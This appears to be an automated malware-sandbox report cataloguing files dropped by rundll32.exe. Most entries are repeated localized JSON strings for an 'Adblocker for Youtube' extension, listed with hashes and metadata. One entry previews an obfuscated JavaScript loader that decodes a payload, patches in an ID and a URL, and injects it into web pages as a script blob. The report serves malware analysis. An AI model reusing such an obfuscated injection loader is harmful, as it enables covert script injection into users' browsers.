SHA-256:F64C79D2C0340FDFD1355E5CF7402411E52DFD8C4E19B4F0D244A8E8DDFD64E8
SHA-512:05FBC49EA69B04175F594EB1A5EA684AA907D13C5651B9480393D75FEE7B060BE9CC83AAF908611DEB6EA8BB3862A591DF50356C21ECFC4BF6AE3142425D9BA4
Malicious:false
Preview:.{"appName":{"message":"Adblocker ... .. Youtube."},"appDesc":{"message":"....... ... ...... adblock; ...., ......... .. Adblocker ... .. Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:ASCII text, with very long lines (65536), with no line terminators
Category:dropped
Size (bytes):834804
Entropy (8bit):4.237070411495953
Encrypted:false
SSDEEP:6144:nWtlYGNPy3ymXZCfnvpn2qs7UoCheMANPCc3q6ep8ti31OXjNp:X1Hp
MD5:66BADF4B9C5657333475DDF4F2B1B1B9
SHA1:CFE66395CFD19FC37AA50E5286F06AB2F365835E
SHA-256:D37CCA62F722DD667CC8A6F66AC8EE0F41D761FD3E8890D1BD94DB54A999A978
SHA-512:A88B7DF97581E09C0E841DE79748AAC0B5F18EFFA598F1F9FD35906BE1560DCC3706E5FB41CB98ADD51354572EBCFFAD6688149A7D121F33F0A140A13283206C
Malicious:false
Preview:(function(){function _0x8853f7(){var _0x4267a3=function(_0x2b2cd9){var _0x4b9edf,_0x3875da;(_0x4b9edf=window['document'])&&(_0x3875da=_0x4b9edf['head']||_0x4b9edf['body']||_0x4b9edf['documentElement'])?(_0x4b9edf=_0x4b9edf['createElement']('script'),_0x2b2cd9=atob(_0x5ddcb(_0x2b2cd9)),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_1_',''),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_2_','4366A976DB28476FA26AE30CEE10D605'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_3_','Windows NT 10.0; WOW64'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_4_','false'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_6_',''),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_7_','true'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_8_','0'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_5_','https://www.google.com/?h=6fiz7bk1dli28pjdzprzc2iifgzk4e22xjoo.ja7lk70wr'),_0x2b2cd9=new Blob([_0x2b2cd9],{'type':'text/javascript'}),_0x4b9edf['src']=URL['createObjectURL']
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):186
Entropy (8bit):4.746498904467988
Encrypted:false
SSDEEP:3:bk/rhPUHHEUQhGE+2NFV3gBBVR7WHASWFcFsidiCyW/oFBAyXpHE+2NFV3gBT1n:bk/dPMErGE+RVR7MWFc5qNFBAy5HE+j1
MD5:A14D4B287E82B0C724252D7060B6D9E9
SHA1:DA9D3DA2DF385D48F607445803F5817F635CC52D
SHA-256:1E16982FAC30651F8214B23B6D81D451CC7DBB322EB1242AE40B0B9558345152
SHA-512:1C4D1D3D658D9619A52B75BAD062A07F625078D9075AF706AA0051C5F164540C0AA4DACFB1345112AC7FC6E4D560CC1EA2023735BCF68B81BF674BC2FB8123FB
Malicious:false
Preview:.{"appName":{"message":"Bloqueador de anuncios para Youtube."},"appDesc":{"message":"Est.s buscando el video de adblock? As. que descarga bloqueador de anuncios para Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):186
Entropy (8bit):4.746498904467988
Encrypted:false
SSDEEP:3:bk/rhPUHHEUQhGE+2NFV3gBBVR7WHASWFcFsidiCyW/oFBAyXpHE+2NFV3gBT1n:bk/dPMErGE+RVR7MWFc5qNFBAy5HE+j1
MD5:A14D4B287E82B0C724252D7060B6D9E9
SHA1:DA9D3DA2DF385D48F607445803F5817F635CC52D
SHA-256:1E16982FAC30651F8214B23B6D81D451CC7DBB322EB1242AE40B0B9558345152
SHA-512:1C4D1D3D658D9619A52B75BAD062A07F625078D9075AF706AA0051C5F164540C0AA4DACFB1345112AC7FC6E4D560CC1EA2023735BCF68B81BF674BC2FB8123FB
Malicious:false
Preview:.{"appName":{"message":"Bloqueador de anuncios para Youtube."},"appDesc":{"message":"Est.s buscando el video de adblock? As. que descarga bloqueador de anuncios para Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):127
Entropy (8bit):4.783683649251908
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW8xBBVR7WHKR1FTM2eC9owxJKZW8xBT1n:bk/dP6GeRVR7TpleYERj1
MD5:E47E22D7E235CDA9AB5CE8B0F4F1E1F8
SHA1:0ED41228E67650D4F5D84397EAC564BCF9F4788F
SHA-256:D66AF121A08B3CA39E89DD2B5630C9E62772CD8D12A025D5529BCD26C9D8589A
SHA-512:3D7F5B72B73362A3E4245051B8F4AF485FFF52BAD315F5C616D2C6C035C382757A8A21157FA8F54060F6AFD39197E39CFC902E9D806A40F46D39C24825CDE30C
Malicious:false
Preview:.{"appName":{"message":"Adblocker Youtube."},"appDesc":{"message":"Otsid video adblock? Nii et lae Adblocker Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):133
Entropy (8bit):4.875948501246631
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW8xBBVR7WHA5oOeC5bxsFW8xAR1n:bk/dP6GeRVR7LoOeRlS
MD5:DFB95328C33900FC5F0943DB17BB7A7B
SHA1:C52582635A8FA23E049B60986A1A78AA3DC90FED
SHA-256:9FE90EC988C0D089C7756146124CC656A56C9336AD7049456200817E1D597E32
SHA-512:6636562113F42AD7BE7998498287F78C956E2B595AB4BBEAF40D814BC10D9226AB073DD16E165A366A9BE16E76D9B54F23C7E600A65333ACE15EA15B172971FB
Malicious:false
Preview:.{"appName":{"message":"Adblocker Youtube."},"appDesc":{"message":"Etsitk. video adblock? Joten lataa Adblocker Youtubeen.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):190
Entropy (8bit):4.840085778181825
Encrypted:false
SSDEEP:3:bk/rhPUHHEUQ1UIlgQWxBBVR7WHTsEFXGXGCzEpAOFEqDjmovLFHJKJAHIlgQWxL:bk/dPME/bgQCVR7SlfepqHDxvL9JdOgV
MD5:460291C4926F8C24D245A74A76B88155
SHA1:6944B567438ACF86CBE6A6A3519DC84822B8B21B
SHA-256:33976589FF5232B39103D8A8E474F4044258DFA30AE667B90F176FA93C7E9AD2
SHA-512:11E9F61BF62BA6F0506D7C200079F7D41ED8A2BD644624551CF03880C517ED0748105307B20D493D15DEDE7DEEB76BEB9FF11ECA6C05E4E415227CF88D978614
Malicious:false
Preview:.{"appName":{"message":"Bloqueur de pub pour Youtube."},"appDesc":{"message":"Vous .tes . la recherche pour la vid.o adblock? Afin de t.l.charger bloqueur de pub pour Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):156
Entropy (8bit):4.967518278690115
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWEGKQ2gBBVR7WHOAXACTAAhFEBknfJfTfmZWEGKQ2gBHMk6kL0Y:bk/dP6Gmd4VR74XroknfJypdEMC0Y
MD5:10461FD634DC768A6B93196B0879FD0F
SHA1:620AFFCA1A6EA63FA015783D367BB264A2DDA8D1
SHA-256:FF48B5761FE27245CD49308014EEC10BF057B395846A4E1091B13458CCD84848
SHA-512:B7E925A0DF6C5E84FE764AA2EDA44E29D1B2A6B40AFDCAD3C21055E0D6C7E4E3274503BB821D03CFF0AD76EBB09C7C0DB1DA8695DAA207191A463C149AEE8A8F
Malicious:false
Preview:.{"appName":{"message":"Adblocker a Youtube."},"appDesc":{"message":"Keres vide. adblock? .gy a let.lt.s Adblocker a Youtube.szolg.ltat.sban."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.793805282505165
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVAVqBBVR7WHWREEmiKjKFCiQpEWpKZWVAVqBT1n:bk/dP6GtVR7yEmwFXjWky1
MD5:4CF617F75C36EF8C5C566F7E9689A123
SHA1:2F8E9DA815F05E4A3F9F70B2C103DAAB3E27069E
SHA-256:2603AA798E78D7DC60EB166545436A264658F7B1B6B4B7436D367A969033B263
SHA-512:D857DBCBE5359F222B7922D784B1E795BF28D5A81A9FFEA1AB5DAF8F63408F9A3F580CC6D22DE68C267E88FDB03141D3FD85162FB1C8A9FB8C1E2562D1DE5AD2
Malicious:false
Preview:.{"appName":{"message":"Adblocker per Youtube."},"appDesc":{"message":"Stai cercando video adblock? Quindi, scaricare Adblocker per Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):149
Entropy (8bit):4.915447629764539
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWQeDl8K5gBZYK/R7WHM+O3eC4omW+FkkW5Hb+511n:bk/dP6Gyyl826R7IOuNo+Fsa
MD5:1AD07246758F88714FD02AEE442F86EC
SHA1:64CC12DF3A673E2673F55C3D0D7683B5D8DF99BD
SHA-256:4F19A929F71B3A20E145B12B61377E610D70CA1A020CEE8D0E8EBF38D7F1F0CA
SHA-512:2D7BBF619D25C382B6357372CA7A29DA22B682FC3B12795A83654DFE109EB1CCB81E4D7304354A9B3AC324C7D9822E0A81563CA8920BC06DFFA733BA3C849168
Malicious:false
Preview:.{"appName":{"message":"Adblocker u. \" Youtube.\""},"appDesc":{"message":"Ie.kote video adblock? Kad parsisi.sti Adblocker \"Youtube\".."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):149
Entropy (8bit):4.9824655648065
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW8xBBVR7WHTfPIOJ5itFC/hqQ5hHHB2W8xBT1n:bk/dP6GeRVR7SfPzJ8tFIdFBWj1
MD5:C903EB1F9762BB428DF73858E79FC5C6
SHA1:D367BEF71658D76611A2E7F0E5FA3F8AAC3EBE43
SHA-256:BD607C80998190DE84D4D5610A2B8F4BCEE0D9500BC753DDFEB0B5A94F4DD4AE
SHA-512:1EC0115709D39F34C503F383B896442B4D34A5529F142D352A1ED94F4D275BAD3385EA9ADD4B5035E9BCAFA46452FF25C0C8074606200B29E627430E9D333AD0
Malicious:false
Preview:.{"appName":{"message":"Adblocker Youtube."},"appDesc":{"message":"Vai j.s mekl.jat video adblock? Lai lejupiel.d.tu Adblocker Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):194
Entropy (8bit):4.959575701188163
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW1SfGKgBBVR7WHVxEdO9aX1jF0l1V1yVF1Gv1lhaiVVfoEgGqOTg:bk/dP6G7RVR7UxEUYXPdvYv88VQEoRj1
MD5:711BE6153463FB924A8CB817DC59DCEC
SHA1:13CB5590E37FC03385875640AB40D87C8640DB7E
SHA-256:28DF1E64F5E5EE71277B6C154A7905F11C20C6C1115433DF23485FAE299AD7AE
SHA-512:7B276E3675D004A3337D0F38F828D7BB4AB8E2F23C2BEDFE29496DC700C71E62727C20533BBF0A45F9119A452404D2658B63F6A7BB1052DA7F862024F32AD0EE
Malicious:false
Preview:.{"appName":{"message":"Adblocker .. Youtube."},"appDesc":{"message":".... ... .. ....... .. ..... adblock? .... ......... Adblocker .. Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):153
Entropy (8bit):4.778562590537941
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWToFBBVR7WHHaQgFfqFG3C3C4pIHWWToFBT1n:bk/dP6G+VVR7GaQK3a62f1
MD5:7EECC4311200A6726C4EDFCEEAEF1220
SHA1:A97F8C0E81CACCC9FA581DC44DA73E7234DC53A0
SHA-256:EA3C7300E6523FE08C28F073E7A34D043467E6EED330A031BC23CADA905762DC
SHA-512:2DCE3EA0649FD1946C40AAB054CBF37CA3E7EEE66DB0A8A0335F0BE3C0622A5C1714C7312A8BCE92667EF955845AC4E78E7B4B83D3C96DD425371EE9A77F5E70
Malicious:false
Preview:.{"appName":{"message":"Adblocker voor Youtube."},"appDesc":{"message":"Bent u op zoek voor video adblock? Dus download Adblocker voor Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):152
Entropy (8bit):4.887676383355589
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHA0Fn8RRrdCg1JEWG/WDMF8xBT1n:bk/dP6G5VR7gn0JV1JE61
MD5:CE1C94D6CE80894AC99A2E9076B30B7C
SHA1:BB67FF27CB03C4DE720390BD03B417E96DC8B4AB
SHA-256:DA8F186B15A95192E69A3924545DE56516C7618236E85BD2C84AB3AAD8B117FB
SHA-512:D713C90E9B670CBDC2C2BE8C5F0080FDF93A7CA8B2BFE5D3410B452FE68BBFDEC98A9A6DD3CA13146ED6B0AD9B28A3A97D27B8E044A5758949B185531BB619DA
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Er du p. jakt etter video adblock? S. last ned Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
